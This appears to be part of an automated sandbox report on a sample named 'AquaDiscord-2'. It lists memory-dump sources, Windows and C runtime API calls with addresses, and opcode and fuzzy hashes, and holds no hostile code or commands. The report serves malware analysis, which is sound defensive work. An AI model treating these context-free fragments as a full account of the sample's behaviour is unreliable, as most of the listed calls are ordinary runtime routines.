                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: ad6ffbff5a36d3de9f682a7fc170742d135d9f1fc7d7c6286aee00a4f8a3ee37
                                                                                          • Instruction ID: f465591a291b55a8200ef7bd17a2c7aad28961531b6013aa55d0e425cf012fdd
                                                                                          • Opcode Fuzzy Hash: ad6ffbff5a36d3de9f682a7fc170742d135d9f1fc7d7c6286aee00a4f8a3ee37
                                                                                          • Instruction Fuzzy Hash: FB0147B221A3126EF7393B79BCC5A6F2EC4EB9177572002B9FA11522F2EF514C425380
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00B04E2B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00B050A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 2673424686-393685449
                                                                                          • Opcode ID: 3126fa057f703c9550acbe18c13fbe1f947b9beec8b0cc918a924364b50356fc
                                                                                          • Instruction ID: 382cb8e3033d6e93f218cc63b96781ccaf46da17462efce920fd4da573770520
                                                                                          • Opcode Fuzzy Hash: 3126fa057f703c9550acbe18c13fbe1f947b9beec8b0cc918a924364b50356fc
                                                                                          • Instruction Fuzzy Hash: E9B15AB1800209EFCF28DFA4C9819AEBBF5FF14310B1445EAEA156B692D731DA51CF91
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00B15644,000000FF,?,00AFF279,00AFF160,?,00AFF315,00000000), ref: 00AFF1ED
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AFF1FF
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00B15644,000000FF,?,00AFF279,00AFF160,?,00AFF315,00000000), ref: 00AFF221
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 9e2d61e13461fb4397d7e99ec1613535c650c9a082faaf5e63cffc420cb97ada
                                                                                          • Instruction ID: bef586201695dd0bc749766bf388aa54035ab419f69b0568bcee6d4715e3a696
                                                                                          • Opcode Fuzzy Hash: 9e2d61e13461fb4397d7e99ec1613535c650c9a082faaf5e63cffc420cb97ada
                                                                                          • Instruction Fuzzy Hash: 2B01A231994619AFDB118F94DC09FFEBBF8FB04B11F404625F821A22E0DB749900CA94
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 00B06E6F
                                                                                          • __alloca_probe_16.LIBCMT ref: 00B06F38
                                                                                          • __freea.LIBCMT ref: 00B06F9F
                                                                                            • Part of subcall function 00B056B1: HeapAlloc.KERNEL32(00000000,00B07635,?,?,00B07635,00000220,?,?,?), ref: 00B056E3
                                                                                          • __freea.LIBCMT ref: 00B06FB2
                                                                                          • __freea.LIBCMT ref: 00B06FBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1096550386-0
                                                                                          • Opcode ID: 96a9e5855576790a151e6be68607f2455f5c34f5dfc67e395efcf6872c004d08
                                                                                          • Instruction ID: e94ea3bfbf5014c75ea09299e8bf93f34aa5c52b302f6235ddbbd9ea2f2f0319
                                                                                          • Opcode Fuzzy Hash: 96a9e5855576790a151e6be68607f2455f5c34f5dfc67e395efcf6872c004d08
                                                                                          • Instruction Fuzzy Hash: FB519372600207AFEB219EA1ED81EBBBFE9DF54750F1501A9FD04D6291EB31DC60D6A0
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 00AF77B9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF77C4
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7832
                                                                                            • Part of subcall function 00AF76AF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AF76C7
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00AF77DF
                                                                                          • _Yarn.LIBCPMT ref: 00AF77F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID:
                                                                                          • API String ID: 1088826258-0
                                                                                          • Opcode ID: c7c29074cab5524af70d5ab021fc11d53fbb774ae87d184f5868412de22c2e1b
                                                                                          • Instruction ID: 44b0e4060de4082361ca372aac8ae43fe9ecc48c7dde50353a9bc09a4a1b15f7
                                                                                          • Opcode Fuzzy Hash: c7c29074cab5524af70d5ab021fc11d53fbb774ae87d184f5868412de22c2e1b
                                                                                          • Instruction Fuzzy Hash: 8201DF75A001288FCB09EFA4C9455BD7BA1FFE4390B544049FA1257381CF34AE82CBC1
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B0F70C,00000000,?,00B21E20,?,?,?,00B0F643,00000004,InitializeCriticalSectionEx,00B190D4,00B190DC), ref: 00B0F67D
                                                                                          • GetLastError.KERNEL32(?,00B0F70C,00000000,?,00B21E20,?,?,?,00B0F643,00000004,InitializeCriticalSectionEx,00B190D4,00B190DC,00000000,?,00B0535C), ref: 00B0F687
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B0F6AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: fabb5d5330efa8095e8f22c6a51e4250ab4c255adae3351d6e41970bac349878
                                                                                          • Instruction ID: 49b09f0a3350a0250f59da9ec9532a3ab1702894e4632ccb850bf16cd7ba8a66
                                                                                          • Opcode Fuzzy Hash: fabb5d5330efa8095e8f22c6a51e4250ab4c255adae3351d6e41970bac349878
                                                                                          • Instruction Fuzzy Hash: 2CE01231740209B6EB301BA0DC0ABA93F99DB50BD0F544070FD1CA84F1DB62E8909544
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00B0D771
                                                                                            • Part of subcall function 00B057C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B06F95,?,00000000,-00000008), ref: 00B05822
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B0D9C3
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B0DA09
                                                                                          • GetLastError.KERNEL32 ref: 00B0DAAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: 26439a23073797621ddbb2b86d8e619891e7f9bafb458ff48d1f62c041eb2cf7
                                                                                          • Instruction ID: 7edbf8b0c0502437228be2dab370089564d7a5189b1b1f1311a399b3922e9019
                                                                                          • Opcode Fuzzy Hash: 26439a23073797621ddbb2b86d8e619891e7f9bafb458ff48d1f62c041eb2cf7
                                                                                          • Instruction Fuzzy Hash: 4AD15A75E042589FDB15CFE8C880AEDBBF5FF48314F2441AAE556EB292D630A942CB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1740715915-0
                                                                                          • Opcode ID: 2d2da4bf046a934360c0974aa104be04f482c53fc138b09c2f7dbd720afbb5fb
                                                                                          • Instruction ID: 58bd2319bd6077c075deca4ee512f4250ec2a9a0ff370083ca2a0f0de05c304c
                                                                                          • Opcode Fuzzy Hash: 2d2da4bf046a934360c0974aa104be04f482c53fc138b09c2f7dbd720afbb5fb
                                                                                          • Instruction Fuzzy Hash: 8B51D1F2604606AFDB288F54D981BBABBE4EF54311F2445ADEB09876D0E731EC40CB94
                                                                                          APIs
                                                                                            • Part of subcall function 00B057C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B06F95,?,00000000,-00000008), ref: 00B05822
                                                                                          • GetLastError.KERNEL32 ref: 00B0B59A
                                                                                          • __dosmaperr.LIBCMT ref: 00B0B5A1
                                                                                          • GetLastError.KERNEL32 ref: 00B0B5DB
                                                                                          • __dosmaperr.LIBCMT ref: 00B0B5E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: 75dbb3cb892ee9e1102de9201b21fb3058a1bcbd5d327ce6e3f3c78f376944ea
                                                                                          • Instruction ID: 958ae5f1893c1ddd581a724669b0f7c90760220ec344b2143b6e26b9dfcec64d
                                                                                          • Opcode Fuzzy Hash: 75dbb3cb892ee9e1102de9201b21fb3058a1bcbd5d327ce6e3f3c78f376944ea
                                                                                          • Instruction Fuzzy Hash: D521807160020AEFDB20AF66CC91C6BBFE9EF1436471085E8F929975D1EB30ED408B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6835e124cc65ba7e5d80b3c2c18035bbda44cd8e1453c64de71ce3cf316bb55b
                                                                                          • Instruction ID: 916b174fe6189bd1b685ae301bc70afe9defcf428cc7d4ec3a4279af3c0e8472
                                                                                          • Opcode Fuzzy Hash: 6835e124cc65ba7e5d80b3c2c18035bbda44cd8e1453c64de71ce3cf316bb55b
                                                                                          • Instruction Fuzzy Hash: EA21507160020EAFDB20FFF69E8197A7BAAAF443F47104514FA19D7550DB30EC509790
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00B0C936
                                                                                            • Part of subcall function 00B057C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B06F95,?,00000000,-00000008), ref: 00B05822
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B0C96E
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B0C98E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: 5b8e3effa3091e6ecb34226a8a378f1bacde558401d5af3eab4e0c87717086ac
                                                                                          • Instruction ID: c73987766b401bf1abbf4a480d231e53157856eb2db50644ecd2d27ff188fa3b
                                                                                          • Opcode Fuzzy Hash: 5b8e3effa3091e6ecb34226a8a378f1bacde558401d5af3eab4e0c87717086ac
                                                                                          • Instruction Fuzzy Hash: E61161B2501619BFE62627B55CC9CBF6EDCDE853D47A046A9F80292181FF21CD0099B5
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00B1399F,00000000,00000001,?,?,?,00B0DB00,?,00000000,00000000), ref: 00B14467
                                                                                          • GetLastError.KERNEL32(?,00B1399F,00000000,00000001,?,?,?,00B0DB00,?,00000000,00000000,?,?,?,00B0D446,?), ref: 00B14473
                                                                                            • Part of subcall function 00B144D0: CloseHandle.KERNEL32(FFFFFFFE,00B14483,?,00B1399F,00000000,00000001,?,?,?,00B0DB00,?,00000000,00000000,?,?), ref: 00B144E0
                                                                                          • ___initconout.LIBCMT ref: 00B14483
                                                                                            • Part of subcall function 00B144A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B14441,00B1398C,?,?,00B0DB00,?,00000000,00000000,?), ref: 00B144B8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00B1399F,00000000,00000001,?,?,?,00B0DB00,?,00000000,00000000,?), ref: 00B14498
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: fe0be8fdacf1e513f48f815fbfc397f627ebb7a2ddcc82949d6968ae1e2fdfa1
                                                                                          • Instruction ID: 3881f1f9b08458202e988c9c8ec0a829bb682476ac67ed7b5c5875da3e5a9419
                                                                                          • Opcode Fuzzy Hash: fe0be8fdacf1e513f48f815fbfc397f627ebb7a2ddcc82949d6968ae1e2fdfa1
                                                                                          • Instruction Fuzzy Hash: 49F03036400218BBCF221F95EC48AD93F66FB493F0F918450FE1996230CF32C8609B90
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00AFA307
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00AFA316
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00AFA31F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00AFA32C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 7d06dcfe8c4c50b290d5a4ddf4ebeed139decb70ec8d91da21aaae07177ab30a
                                                                                          • Instruction ID: 63ee98bfe8c95fd5ab73d0a83e5207b46f23f7291108eb2ea5746a9db9dbd2b3
                                                                                          • Opcode Fuzzy Hash: 7d06dcfe8c4c50b290d5a4ddf4ebeed139decb70ec8d91da21aaae07177ab30a
                                                                                          • Instruction Fuzzy Hash: 84F05F75D1020DEBCB04DBB4DA499DEBBF4FF1C204BA18995E822E7150EA30AB44DB51
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429939
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429A8C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: Xrsp
                                                                                          • API String ID: 237503144-748625766
                                                                                          • Opcode ID: fa13007f2bee2d67c54e7cf89fb10b18ac5bf56a918508bb9d97b2ce0acdbfc2
                                                                                          • Instruction ID: 4f4ecb18278d76325596eabc208a3bfd82e07ba985bdba3104b664f90404af25
                                                                                          • Opcode Fuzzy Hash: fa13007f2bee2d67c54e7cf89fb10b18ac5bf56a918508bb9d97b2ce0acdbfc2
                                                                                          • Instruction Fuzzy Hash: 146107B4E403155BDB009F7DC9423AEFFB2FB85211F59826EE8546B386C77458068BE2
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B05031,?,?,00000000,00000000,00000000,?), ref: 00B05155
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: 1a3d04abb828008be788469bbf73d7d969478061ff009953401a3c86d0799b69
                                                                                          • Instruction ID: 5594469fdb53435593e1ec1433ae6bd53db010139f6207031f600fcde7d390b7
                                                                                          • Opcode Fuzzy Hash: 1a3d04abb828008be788469bbf73d7d969478061ff009953401a3c86d0799b69
                                                                                          • Instruction Fuzzy Hash: BB415871900609AFCF25DF98CD81AEEBBB5FF48300F148099FA09A72A1D735AA51DF50
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00B04C13
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3493665558-3733052814
                                                                                          • Opcode ID: 2bc179bff8e76723036f57f9e75cd380d96e0ee420206c1324eb2164604c59ef
                                                                                          • Instruction ID: 9c21f47b4521cf6fd5cd48e141b51566248c5d31cfe6458a1828a2eb03694dcd
                                                                                          • Opcode Fuzzy Hash: 2bc179bff8e76723036f57f9e75cd380d96e0ee420206c1324eb2164604c59ef
                                                                                          • Instruction Fuzzy Hash: 5131E1B2401219ABDF369F50C8449AE7FE5FF09315B1882EAFF544A1A1C332CCA1DB91
                                                                                          APIs
                                                                                          Strings
